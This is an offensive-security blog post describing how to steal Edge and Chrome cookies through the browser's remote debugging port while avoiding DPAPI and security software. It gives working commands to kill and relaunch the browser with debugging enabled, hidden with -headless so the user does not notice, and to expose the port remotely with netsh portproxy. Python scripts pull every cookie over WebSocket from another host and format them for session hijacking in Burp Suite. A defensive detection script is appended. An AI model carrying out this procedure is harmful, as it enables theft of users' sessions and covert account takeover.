Getting Chromium-based browser cookies using remote debugging

Foreword

This article describes how to obtain the cookies of Chromium-based browsers (Edge, Chrome) without relying on DPAPI, by using the browser's own remote debugging protocol.

Remote debugging

Let us take Edge as the example. Edge is based on Chromium, and Chromium can enable remote debugging. The official documentation for enabling it is here:

https://blog.chromium.org/2011/05/remote-debugging-with-chrome-developer.html

chrome.exe --remote-debugging-port=9222 --user-data-dir=remote-profile

So what can you do once remote debugging is enabled? The official documentation continues:

https://chromedevtools.github.io/devtools-protocol/tot/Storage/

The document above is the Chrome DevTools Protocol reference. It explains that to debug and inspect Chrome through the protocol you must first enable remote debugging:

Once remote debugging is enabled, the browser also exposes a /json endpoint and the various protocol APIs (the Storage domain among them):

Since Edge is based on Chromium, Edge should be able to enable remote debugging too. Try the Chrome remote debugging switch on Edge:

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222

Testing shows that it works, with one prerequisite: no msedge process may already be running. Otherwise the command above starts a new Edge process but the remote debugging port is not opened. Command to stop Edge:

Get-Process msedge | Stop-Process

Getting cookies

First, check whether the Chrome DevTools Protocol can read browser passwords. The documentation has no such method:


The developer tools you normally bring up with F12 give no way to obtain browser passwords either.

Searching further for cookies, there is a Network.getAllCookies method, but the documentation notes that it is deprecated and recommends Storage.getCookies instead:

So try Storage.getCookies to see whether cookies can be retrieved. After enabling remote debugging, get the WebSocket address:

Then, when trying to send and receive data with Python's websocket-client module, I found that the connection was rejected with a 403:

According to the message it appears to be an origin (CORS) restriction, and the message also gives the fix:

--remote-allow-origins=*

After adding that switch, sending the following message retrieves the cookies successfully:

{"id": 1, "method": "Storage.getCookies"}

To make the WebSocket interface reachable remotely, the remote debugging port can be forwarded with a port proxy:

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=9222

This makes the target's remote debugging port accessible from another host:

Writing the code

There is a GitHub repository that automatically opens the remote debugging port and retrieves the cookies:

https://github.com/defaultnamehere/cookie_crimes/blob/master/cookie_crimes.py

That code has several problems. First, it does not handle the origin (CORS) restriction. Second, it uses the possibly deprecated Network.getAllCookies. Third, the remote debugging port can be opened from the command line instead of from Python. The modified code is as follows:

import json
import requests
import websocket

# CDP request: Storage.getCookies (the non-deprecated replacement for Network.getAllCookies)
GET_ALL_COOKIES_REQUEST = json.dumps({"id": 1, "method": "Storage.getCookies"})

# Address of the forwarded remote debugging port (the author's lab host)
DEBUG_ENDPOINT = "http://10.211.55.8:48333"


def hit_that_secret_json_path_like_its_1997():
    # /json lists the open targets; each entry carries its own webSocketDebuggerUrl
    response = requests.get(DEBUG_ENDPOINT + "/json", timeout=10)
    response.raise_for_status()
    targets = response.json()
    if not targets:
        raise RuntimeError("no debugging targets listed; the browser must have a page open")
    return targets[0]["webSocketDebuggerUrl"]


def gimme_those_cookies(ws_url):
    ws = websocket.create_connection(ws_url)
    try:
        ws.send(GET_ALL_COOKIES_REQUEST)
        # Wait for the reply that matches our request id; CDP sessions may also emit events
        while True:
            response = json.loads(ws.recv())
            if response.get("id") == 1:
                break
    finally:
        ws.close()
    if "error" in response:
        raise RuntimeError(response["error"])
    return response["result"]["cookies"]


if __name__ == "__main__":
    ws_url = hit_that_secret_json_path_like_its_1997()
    print(ws_url)
    cookies = gimme_those_cookies(ws_url)
    print(cookies)

In this way the remote debugging port is opened on the target machine and the cookies are retrieved. To keep the opened browser from being noticed by the user you can add the -headless switch, but it has a drawback that is discussed below. To keep the /json endpoint from returning an empty list, it is recommended to open a website when the browser starts. The complete command sequence is therefore:

# Close Edge
Get-Process msedge | Stop-Process

# Start Edge with remote debugging (& is PowerShell's call operator, required to run a quoted path)
& "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.baidu.com --remote-debugging-port=9222 --remote-allow-origins=* -headless

# Forward the remote debugging port
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=9222

# Query the /json endpoint for the WebSocket address and retrieve the cookies (Python script above)

# Remove the port forwarding
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=48333

Practical test

Start Edge with the command above:

When retrieving cookies, I found that only the cookies of www.baidu.com are returned:

This is the drawback of the -headless switch mentioned above: only cookies of websites that have actually been opened are returned. So if you want the cookies of a specific target website you must either repeat the steps above for that site, or drop the -headless switch. The author recommends dropping -headless; the opened browser can then also be used normally by the user. The recommended command sequence is:

# Close Edge
Get-Process msedge | Stop-Process

# Start Edge with remote debugging (& is PowerShell's call operator, required to run a quoted path)
& "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.baidu.com --remote-debugging-port=9222 --remote-allow-origins=*

# Forward the remote debugging port
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=9222

# Query the /json endpoint for the WebSocket address and retrieve the cookies (Python script above)

# Remove the port forwarding
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=48333
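From the defender's side, the sequence above leaves a recognisable trail in process-creation telemetry: a browser launched with --remote-debugging-port and --remote-allow-origins, followed by a netsh portproxy onto that same port. The following Python is an added detection example, not code from the article; the Sysmon-style records it runs over are constructed, not real telemetry.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry) that
# mimic the command sequence described in the article.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" '
                    r"https://www.baidu.com --remote-debugging-port=9222 --remote-allow-origins=*"},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 "
                    "listenport=48333 connectaddress=127.0.0.1 connectport=9222"},
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default'},
]

BROWSERS = {"msedge.exe", "chrome.exe", "chromium.exe"}
DEBUG_PORT = re.compile(r"--remote-debugging-port=(\d+)")
ALLOW_ORIGINS = re.compile(r"--remote-allow-origins=(\S+)")
PORTPROXY = re.compile(r"portproxy\s+add\s+v4tov4\b.*?listenport=(\d+).*?connectport=(\d+)", re.I)


def analyze(events):
    """Return a list of (severity, message) findings for a batch of process events.

    A browser started with a debugging port is medium severity on its own; a
    later netsh portproxy whose connectport equals that debugging port is high,
    because the /json and WebSocket endpoints then become reachable from the network."""
    findings = []
    debug_ports = set()
    for ev in events:
        image = ev["Image"].lower().rsplit("\\", 1)[-1]
        cmd = ev["CommandLine"]
        if image in BROWSERS:
            m = DEBUG_PORT.search(cmd)
            if not m:
                continue
            port = int(m.group(1))
            debug_ports.add(port)
            msg = f"{image} started with remote debugging on port {port}"
            origins = ALLOW_ORIGINS.search(cmd)
            if origins:
                msg += f", allowed origins {origins.group(1)}"
            findings.append(("medium", msg))
        elif image == "netsh.exe":
            m = PORTPROXY.search(cmd)
            if not m:
                continue
            listen, connect = int(m.group(1)), int(m.group(2))
            if connect in debug_ports:
                findings.append(("high", f"portproxy exposes debugging port {connect} on {listen}"))
            else:
                findings.append(("low", f"portproxy {listen} -> {connect}"))
    return findings
```

A persistent portproxy entry can also be audited directly with `netsh interface portproxy show all`, independent of process telemetry.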

How is the data obtained above used? The author provides the following code to assemble it into a string in the format the Cookie header requires:

def to_cookie_dict(data):
    # Keep only cookies scoped to the target site; other entries return None
    if 'www.chinabaiker.com' in data.get('domain', ''):
        cookie_dict = {data['name']: data['value'], 'Domain': data['domain'], 'Path': data['path'], 'Expires': data['expires']}
        print(cookie_dict)
        return cookie_dict
    return None


# Replace with the "cookies" array returned by Storage.getCookies
data_list = [{}]

cookie_dict_list = [to_cookie_dict(data) for data in data_list]

# Iterate over the cookie dictionaries and format each key/value pair as key=value
cookie_str_list = []
for cookie_dict in cookie_dict_list:
    if cookie_dict is None:  # entry did not match the domain filter
        continue
    for k, v in cookie_dict.items():
        cookie_str_list.append('{}={}'.format(k, v))

# Join the key=value strings with ;
cookie_str = ';'.join(cookie_str_list)
print(cookie_str)

Because many cookies are returned, a simple domain filter is applied at the start of the code:

if 'www.chinabaiker.com' in data['domain']:

The final result is as follows.
First, the website is in a logged-out state:

Run the code above to get the cookie string:

Then put it into Burp Suite for automatic replacement. The author's replacement rule is as follows:

Finally, the cookie replacement succeeds and the target system is logged in:

The Chrome browser works the same way, so it is not covered at length:

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.baidu.com --remote-debugging-port=9222  --remote-allow-origins=*

Summary

This article described a method of obtaining the cookies of Chromium-based browsers without relying on DPAPI, which retrieves browser cookies with as little interference from security software as possible.

Origin blog.csdn.net/qq_38154820/article/details/131696048